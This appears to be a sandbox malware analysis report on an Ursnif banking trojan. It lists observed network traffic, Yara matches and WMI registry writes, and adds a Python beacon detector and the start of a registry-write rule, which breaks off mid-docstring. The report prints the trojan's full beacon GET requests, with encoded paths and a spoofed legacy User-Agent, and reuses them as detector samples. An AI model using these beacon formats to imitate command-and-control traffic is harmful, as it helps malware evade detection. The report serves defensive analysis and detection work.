                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Length: 1245
  Content-Type: text/html
  Server: Microsoft-IIS/10.0
  request-id: 42a9a6e9-6dd8-e4f4-89ca-fa996edc4ee9
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-CalculatedFETarget: AM0PR03CU001.internal.outlook.com
  X-BackEndHttpStatus: 404
  X-FEProxyInfo: AM0PR03CA0028.EURPRD03.PROD.OUTLOOK.COM
  X-CalculatedBETarget: AM0P195MB0754.EURP195.PROD.OUTLOOK.COM
  X-BackEndHttpStatus: 404
  X-RUM-Validated: 1
  X-Proxy-RoutingCorrectness: 1
  X-Proxy-BackendServerStatus: 404
  MS-CV: 6aapQtht9OSJyvqZbtxO6Q.1.1
  X-FEServer: AM0PR03CA0028
  X-Powered-By: ASP.NET
  X-FEServer: AM6P195CA0091
  Date: Mon, 11 Oct 2021 20:51:06 GMT
  Connection: close
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Length: 1245
  Content-Type: text/html
  Server: Microsoft-IIS/10.0
  request-id: 6a56c307-e9c6-c4f1-93bd-eb8372a66b3c
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-CalculatedBETarget: AM5PR0202MB2546.eurprd02.prod.outlook.com
  X-BackEndHttpStatus: 404
  X-Proxy-RoutingCorrectness: 1
  X-Proxy-BackendServerStatus: 404
  MS-CV: B8NWasbp8cSTveuDcqZrPA.1
  X-Powered-By: ASP.NET
  X-FEServer: AM5PR0201CA0014
  Date: Mon, 11 Oct 2021 20:51:07 GMT
  Connection: close
Source: WerFault.exe, 00000012.00000002.526349700.0000000005348000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.524969424.0000000004A35000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.542519805.0000000004C13000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp, String found in binary or memory: http://ogp.me/ns#
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp, String found in binary or memory: http://ogp.me/ns/fb#
Source: loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, String found in binary or memory: https://blogs.msn.co
Source: loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, String found in binary or memory: https://blogs.msn.com/
Source: loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp, String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633985424&rver
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp, String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp, String found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp, String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 00000013.00000002.531558276.0000000004A0C000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry.microsoftv
                      Source: loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.d
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fRSTOkJCBHcQTlX372kVU%2fXbET532Uukq3yxPfegA%2frK8jg_2
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjXTvRU37X%2fkKAN62uBd3tDT4UuvXf7%2ftv2pa650q_2BNc4gZ
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.152.242:443 -> 192.168.2.5:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.242:443 -> 192.168.2.5:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.5:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.5:49790 version: TLS 1.2
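
The eight GET requests recorded above share one shape: a path of roughly seventeen pseudo-random segments, `_2F`/`_2B` tokens (URL-encoded `/` and `+` with the percent sign rewritten to `_`), a short filename ending in `.jre`, and an out-of-date `Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)` User-Agent on a Windows 10 host, sent with `Host:` set to msn.com or outlook.com. The following detector is an added example and is not part of the Joe Sandbox report; it scores proxy log lines against those four traits. The tab-separated log format, the extra extensions in `SUSPECT_EXTENSIONS`, the segment threshold and the alert threshold are assumptions for the example; the two positive sample paths are copied from the requests above and the benign lines are constructed.

```python
"""Heuristic detector for the beacon shape recorded in this report: GET requests
whose paths are long chains of pseudo-random segments containing '_2F'/'_2B'
(URL-encoded '/' and '+' with the '%' rewritten to '_'), a short filename with a
binary-looking extension such as '.jre', and the legacy
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)' User-Agent.
The log format is constructed for this example: host, method, path and
User-Agent separated by tabs."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Every request in the report carries this out-of-date IE User-Agent on a Windows 10 host.
LEGACY_MSIE_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE [678]\.0; Windows NT")
# '_2F' and '_2B' are '%2F' and '%2B' with the percent sign replaced.
DOUBLE_ENCODED_TOKEN = re.compile(r"_2[FB]")
# Only '.jre' appears in this report; the other extensions are an assumption
# about similar disguises and should be tuned per environment.
SUSPECT_EXTENSIONS = (".jre", ".jpeg", ".jpg", ".png", ".gif", ".avi")
MIN_SEGMENTS = 8       # the observed paths have 17 segments each (assumed threshold)
ALERT_THRESHOLD = 3    # three of the four heuristics must fire (assumed threshold)


@dataclass
class Request:
    host: str
    method: str
    path: str
    user_agent: str


def parse_log_line(line: str) -> Request:
    """Split one tab-separated proxy log line into its four fields."""
    host, method, path, user_agent = line.rstrip("\n").split("\t", 3)
    return Request(host, method, path, user_agent)


def beacon_score(req: Request) -> tuple[int, list[str]]:
    """Score a request: one point per matched heuristic, plus the reasons."""
    reasons: list[str] = []
    path = req.path.split("?", 1)[0]
    segments = [s for s in path.split("/") if s]
    if len(segments) >= MIN_SEGMENTS:
        reasons.append(f"{len(segments)} path segments")
    if DOUBLE_ENCODED_TOKEN.search(path):
        reasons.append("double-encoded '/' or '+' tokens in path")
    if segments and segments[-1].lower().endswith(SUSPECT_EXTENSIONS):
        reasons.append(f"binary-looking filename {segments[-1]!r}")
    if LEGACY_MSIE_UA.match(req.user_agent):
        reasons.append("legacy MSIE User-Agent")
    return len(reasons), reasons


def is_beacon(req: Request) -> bool:
    return beacon_score(req)[0] >= ALERT_THRESHOLD


def scan_log(lines: list[str]) -> list[tuple[str, int, list[str]]]:
    """Return (host + path, score, reasons) for each line at or above the threshold."""
    hits = []
    for line in lines:
        req = parse_log_line(line)
        score, reasons = beacon_score(req)
        if score >= ALERT_THRESHOLD:
            hits.append((req.host + req.path, score, reasons))
    return hits


MSIE_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36")

# Constructed sample log. The first two paths are copied from the requests in this
# report; the remaining three lines are made-up benign traffic to the same hosts.
SAMPLE_LOG = [
    "msn.com\tGET\t/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/"
    "2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/"
    "pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre\t" + MSIE_UA,
    "outlook.com\tGET\t/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/"
    "JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/"
    "GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre\t" + MSIE_UA,
    "www.msn.com\tGET\t/en-us/news/world\t" + CHROME_UA,
    "www.msn.com\tGET\t/en-us//api/modules/fetch\t" + MSIE_UA,
    "static-global-s-msn-com.akamaized.net\tGET\t/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct.css\t" + CHROME_UA,
]

if __name__ == "__main__":
    for url, score, reasons in scan_log(SAMPLE_LOG):
        print(f"score {score}/4  {url}")
        print("    " + "; ".join(reasons))
```

Only the two copied beacon paths reach the threshold; the legacy User-Agent on its own (the fourth sample line) scores one point and is not reported, which keeps the rule from firing on every old-IE client in the proxy logs.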

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara match | File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara match | File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
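
The WMI lines above show the sample reading and writing the registry through `StdRegProv` in `root\default` rather than through the Win32 registry APIs, so a hook or rule that only watches `RegSetValue` calls from `loaddll32.exe`/`rundll32.exe` misses the writes. The rule below is an added example, not part of the Joe Sandbox report. It parses operation strings in the exact form the report prints (`IWbemServices::ExecMethod - <namespace> : <class>::<method>`), splits `StdRegProv` methods into reads and writes, and raises a high-severity alert for any write from a process outside an assumed allowlist and a medium one for any `StdRegProv` use by a DLL or script host. The process/operation pairs are constructed; the optional `Start ` prefix, the allowlist and the host list are assumptions to tune for a real event source.

```python
"""Detection logic for registry access routed through WMI's StdRegProv class,
the behaviour this report records for loaddll32.exe and rundll32.exe.
The operation string format is the one the report prints
('IWbemServices::ExecMethod - <namespace> : <class>::<method>'); the
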